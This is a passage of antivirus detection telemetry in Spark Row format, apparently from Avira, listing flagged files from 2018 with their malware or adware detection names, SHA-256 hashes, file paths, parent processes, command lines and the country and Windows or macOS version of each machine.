  Row(detection=Row(filename='updane.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\45B692~1\\Updane.exe', filesize=2112000, name='ADWARE/DealPly.Gen.#M1.#R1'), hash='ac5c83defcbae3b71003b2a6d2374ff8769681328f358a7abd7f5a5c678ea86f', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:23:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='dc86dd6c1b8d4af8cb1d2d250a3c78d9d21d5314f73bd753e4778c47942c098f', metadata=Row(cmdline='\\\\\\/Embedding', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-02T23:31:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00295f87', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00295f87', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:14:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-091517-0cdd35e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-091517-0CDD35E6', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:14:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-142415-ec6e4e30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-142415-EC6E4E30', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:24:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:52:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-214641-0bbf93a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-214641-0BBF93A5', filesize=64000, name='TR/Siggen.64000.9.#M1.#R1'), hash='c1861cb3e5d8193ebcc61ccee37d797fd13700ea8ad6080c5d62696233d914b6', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:46:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b6bc2e7badad7999be98010944862399c03a6bba27f69a3e394bf53562e649c1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B6BC2E7BADAD7999BE98010944862399C03A6BBA27F69A3E394BF53562E649C1', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='b6bc2e7badad7999be98010944862399c03a6bba27f69a3e394bf53562e649c1', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:40:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c43d', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c43d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:31:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T20:11:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pmp_ipod.dll', filepath='F:\\Portable Software collection Vol 1 (run it from Usb flash drive)\\Audio\\PortW5.21_Pro_Full\\Plugins\\pmp_ipod.dll', filesize=64000, name='TR/ATRAPS.Gen.#M300.#R2775'), hash='baafe18271e42a08098929bd76db1a058cbc77015851267fe35a784edebf7532', metadata=Row(cmdline='a -ep1 -r0 -iext -- . \\\\\\"F:\\\\\\\\Portable Software collection Vol 1 (run it from Usb flash drive)\\\\\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=916992, timestamp='2018-11-04T03:20:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ce0840c544b73dfca4a44f9b2118657b01ed0c790065af4dec89d3f1972202a5', metadata=Row(cmdline='\\\\\\/Embedding', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T16:05:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00296eee', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00296eee', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:36:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='spnativemessage.exe', filepath='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\Surfing Protection\\SPNativeMessage.exe', filesize=1460000, name='W32/Neshta.A.#M1.#R1'), hash='fd862b80b8e984b8872cb4e0e7e7429551b1aab5f28c152edaa0beb4538628ba', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:40:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153450-ada34f6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1a5be72b\\AVSCAN-20181104-145747-B8617A13\\AVSCAN-20181104-153450-ADA34F6A', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='MU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T11:34:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='quqmswersdpsksf.exe', filepath='N:\\\xa0\\QuqMsWERSDpSkSF.exe', filesize=128000, name='TR/Crypt.Xpack.8894.#M1.#R1'), hash='f25c1daf238a29d6211ff51ea00bb12d968e281d6e06ff4599ce9e62a5574578', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:55:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163521-93aae1a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bdc596bd\\AVSCAN-20181104-163425-88410785\\AVSCAN-20181104-163521-93AAE1A4', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:35:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:40:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fda1c81063bc59c14203b0fd321669e062bc7baf372456e61827f99d2b408552', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\FDA1C81063BC59C14203B0FD321669E062BC7BAF372456E61827F99D2B408552', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fda1c81063bc59c14203b0fd321669e062bc7baf372456e61827f99d2b408552', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:29:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[8].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[8].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:26:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='folder lock.exe', filepath="C:\\Program Files (x86)\\NewSoftware's\\Folder Lock\\folder lock.exe", filesize=3968000, name='HEUR/APC.#M1.#R1'), hash='f858fcde6939c722a2343f8b3cca16ea55172e1dfe9968bbc06ef74a7532bc51', metadata=Row(cmdline=None, country='MN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc="C:\\Program Files (x86)\\NewSoftware's\\Folder Lock\\folder lock.exe", parentsize=3968000, timestamp='2018-11-01T04:56:14Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='install.exe', filepath='d:\\driver\\adi1981\\smaxwdm\\w2k_xp\\INSTALL.EXE', filesize=64000, name='W32/Ramnit.C.#M1.#R1'), hash='5b9f064750cb4005ed7c1499cfec17a44dc713a885e0dea3e0160e6e67a25872', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:15:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T02:05:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T03:53:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:56:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='grips_ra.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\grips_ra\\grips_ra.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe14_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:47:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dumpshx.exe', filepath='\\\\ts-xelcea\\share\\zzzcartella cambio computer\\autocad 2012\\x64\\acad\\program files\\Root\\Express\\dumpshx.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='6b39243d41259b85ff24e80741901584b3fb9d81f2abd4ac2b4d3fee5f93b2cb', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:32:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='noteicon.exe', filepath='C:\\Program Files\\IObit\\IObit Uninstaller\\NoteIcon.exe', filesize=116000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='0121252491e1b22093a267ad3ccb52b8ffcd503dc00e8b0019523f4e131da1a6', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:X+1CA+x1IEK3+J7X.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-02T22:05:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:09:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-22-13-11.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-25T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T15:30:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='instmsiw.exe', filepath='E:\\Abby Fine Reader\\Setup\\instmsiW.exe', filesize=1856000, name='W32/Virut.Gen.#M1.#R1'), hash='6f6501c4387709cc413b1303b54eb5ff1efe764328ec5c2c57a4bdc135470d9b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T06:31:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:57:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T00:07:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140533-80ede66b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-140456-79007B41\\AVSCAN-20181102-140533-80EDE66B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:05:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6a46105ce6c5715cb66fd699308dadd2463b29911a5bde6738f4c82f64d45177', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6A46105CE6C5715CB66FD699308DADD2463B29911A5BDE6738F4C82F64D45177', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='6a46105ce6c5715cb66fd699308dadd2463b29911a5bde6738f4c82f64d45177', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T09:46:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1cb6df2bf5442042f20dfa273e9c2c75ac04dc98852235f9ccb77fd7eca3eddf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1CB6DF2BF5442042F20DFA273E9C2C75AC04DC98852235F9CCB77FD7ECA3EDDF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1cb6df2bf5442042f20dfa273e9c2c75ac04dc98852235f9ccb77fd7eca3eddf', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:12:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-233620-5b7a0429', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a62e4262\\AVSCAN-20181102-233231-316EF32D\\AVSCAN-20181102-233620-5B7A0429', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:36:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T15:20:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='konvert245.exe', filepath='\\\\192.168.2.4\\daten\\LC2\\lc\\buf\\lctop2.45-31.03.14\\konvert245.exe', filesize=18560000, name='W32/Infector.Gen9.#M300.#R800021'), hash='16406fc404c83d378fd85aff83733a76fb02eaaa3863f5db65229c1238998e3b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:9RDTQEcFJ0Kb0csk.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T07:04:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='75dc6aa1b03c57b9b03d466a08bfea9e1d74f8c8', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\75dc6aa1b03c57b9b03d466a08bfea9e1d74f8c8', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='2a9bac407e18ec1ec715194b7cc0a9dfd46637444a64fb007dffd7451d50a150', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:45:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='30b74a05d543886bcf20296ccd1c030d2e825381d1249c594e291df91188c233', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\30B74A05D543886BCF20296CCD1C030D2E825381D1249C594E291DF91188C233', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='30b74a05d543886bcf20296ccd1c030d2e825381d1249c594e291df91188c233', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:32:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:50Z'), dt=datetime.date(2018, 11, 2)),
